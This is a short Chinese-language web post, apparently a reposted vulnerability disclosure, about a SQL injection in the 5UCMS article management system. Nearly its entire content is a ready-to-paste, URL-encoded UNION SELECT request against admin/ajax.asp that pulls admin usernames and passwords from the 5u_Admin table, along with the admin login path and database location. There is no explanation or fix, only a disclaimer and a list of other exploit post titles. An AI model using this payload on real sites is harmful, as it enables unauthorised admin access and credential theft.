无忧网络文章管理系统（5UCMS）注入漏洞

2020年1月1日00:01:51评论487 views字数 272阅读0分54秒阅读模式

摘要

后台地址：admin/Login.asp数据库路径：inc/db 目录下漏洞地址：admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin
获取后台账号和密码

后台地址：admin/Login.asp

数据库路径：inc/db 目录下

漏洞地址：

admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin
获取后台账号和密码

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

无忧网络文章管理系统（5UCMS）注入漏洞

微擎普通用户权限SQL注入漏洞

无需登录-悟空CRM 存储型XSS

cacti 0.8.8g cdef.php selected_items 存在sql注入

ZwelL通用图片上传漏洞

discuz某插件设计缺陷可前台getshell

Seacmsv6.25 two sql inject

深信服数据中心2.0某处存在命令执行漏洞

Z-blog前台无需登录包含漏洞一枚

发表评论

在线咨询

微信